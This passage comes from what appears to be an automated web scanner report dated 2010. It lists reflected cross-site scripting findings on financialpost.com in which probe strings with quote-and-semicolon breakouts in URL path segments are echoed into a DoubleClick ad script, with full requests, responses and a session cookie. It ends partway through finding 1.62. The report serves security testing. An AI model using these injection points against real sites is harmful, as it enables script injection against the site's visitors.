GET /careers/Texting+lazy+IMHO/394114026269'%3b7e045e51a09/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62901
Expires: Sun, 19 Dec 2010 03:15:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/texting-lazy-imho/394114026269';7e045e51a09/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=texting-lazy-imho;kw=394114026269';7e045e51a09;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95168182?">
...[SNIP]...

1.50. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Texting+lazy+IMHO/3941140/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b2fc'%3b095459ca46b was submitted in the REST URL parameter 4. This input was echoed as 1b2fc';095459ca46b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Texting+lazy+IMHO/3941140/1b2fc'%3b095459ca46b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44669


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/texting%20lazy%20imho/3941140/1b2fc';095459ca46b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=texting%20lazy%20imho;kw=3941140;kw=1b2fc';095459ca46b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=109440
...[SNIP]...

1.51. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/writing+workers+with+children/3943108/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1639b'%3b9b5d88f64ad was submitted in the REST URL parameter 1. This input was echoed as 1639b';9b5d88f64ad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers1639b'%3b9b5d88f64ad/writing+workers+with+children/3943108/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73488
Expires: Sun, 19 Dec 2010 03:15:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers1639b';9b5d88f64ad/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers1639b';9b5d88f64ad;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=15492710?">
...[SNIP]...

1.52. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/writing+workers+with+children/3943108/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da20f'%3bafe2f9b541b was submitted in the REST URL parameter 3. This input was echoed as da20f';afe2f9b541b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/writing+workers+with+children/3943108da20f'%3bafe2f9b541b/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70161
Expires: Sun, 19 Dec 2010 03:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/writing-workers-with-children/3943108da20f';afe2f9b541b/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=writing-workers-with-children;kw=3943108da20f';afe2f9b541b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17
...[SNIP]...

1.53. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/writing+workers+with+children/3943108/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1b5'%3bbd8a9e4eb8e was submitted in the REST URL parameter 4. This input was echoed as cf1b5';bd8a9e4eb8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/writing+workers+with+children/3943108/cf1b5'%3bbd8a9e4eb8e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37340


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/writing%20workers%20with%20children/3943108/cf1b5';bd8a9e4eb8e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=writing%20workers%20with%20children;kw=3943108;kw=cf1b5';bd8a9e4eb8e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundT
...[SNIP]...

1.54. http://www.financialpost.com/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2aa'%3b1645e3d562a was submitted in the REST URL parameter 1. This input was echoed as 2f2aa';1645e3d562a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css2f2aa'%3b1645e3d562a/print.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:12 GMT
Date: Sun, 19 Dec 2010 03:03:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42946


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/css2f2aa';1645e3d562a/print;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=css2f2aa';1645e3d562a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32009377?">
...[SNIP]...

1.55. http://www.financialpost.com/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 680dd'%3b2c367558245 was submitted in the REST URL parameter 2. This input was echoed as 680dd';2c367558245 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/680dd'%3b2c367558245 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42979


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/css/680dd';2c367558245/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=css;kw=680dd';2c367558245;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=73531346?">
...[SNIP]...

1.56. http://www.financialpost.com/css/story_widget.min.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /css/story_widget.min.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3389'%3bbf445645e7b was submitted in the REST URL parameter 1. This input was echoed as c3389';bf445645e7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssc3389'%3bbf445645e7b/story_widget.min.css HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:08 GMT
Date: Sun, 19 Dec 2010 02:58:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43144


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/cssc3389';bf445645e7b/story_widget.min;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=cssc3389';bf445645e7b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=16703832?">
...[SNIP]...

1.57. http://www.financialpost.com/css/story_widget.min.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /css/story_widget.min.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bee00'%3b7dd73a18789 was submitted in the REST URL parameter 2. This input was echoed as bee00';7dd73a18789 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/bee00'%3b7dd73a18789 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43068


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/css/bee00';7dd73a18789/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=css;kw=bee00';7dd73a18789;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=79726192?">
...[SNIP]...

1.58. http://www.financialpost.com/entrepreneur/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec90'%3bc33f3436c73 was submitted in the REST URL parameter 1. This input was echoed as 7ec90';c33f3436c73 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur7ec90'%3bc33f3436c73/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44045


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur7ec90';c33f3436c73/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur7ec90';c33f3436c73;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37177766?">
...[SNIP]...

1.59. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c621'%3b702d19f034f was submitted in the REST URL parameter 1. This input was echoed as 9c621';702d19f034f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur9c621'%3b702d19f034f/Hidden+angels+Magnet+aspiring+startups/3967315/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83762
Expires: Sun, 19 Dec 2010 03:14:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur9c621';702d19f034f/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur9c621';702d19f034f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70166368?">
...[SNIP]...

1.60. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba98e'%3bb4d3a3bee90 was submitted in the REST URL parameter 3. This input was echoed as ba98e';b4d3a3bee90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315ba98e'%3bb4d3a3bee90/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 47894
Expires: Sun, 19 Dec 2010 03:14:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/hidden-angels-magnet-aspiring-startups/3967315ba98e';b4d3a3bee90/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=hidden-angels-magnet-aspiring-startups;kw=3967315ba98e';b4d3a3bee90;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...

1.61. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9386'%3bab3ee5a69d was submitted in the REST URL parameter 4. This input was echoed as a9386';ab3ee5a69d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/a9386'%3bab3ee5a69d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37683


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/hidden%20angels%20magnet%20aspiring%20startups/3967315/a9386';ab3ee5a69d/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=hidden%20angels%20magnet%20aspiring%20startups;kw=3967315;kw=a9386';ab3ee5a69d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcook
...[SNIP]...

1.62. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html

Issue detail

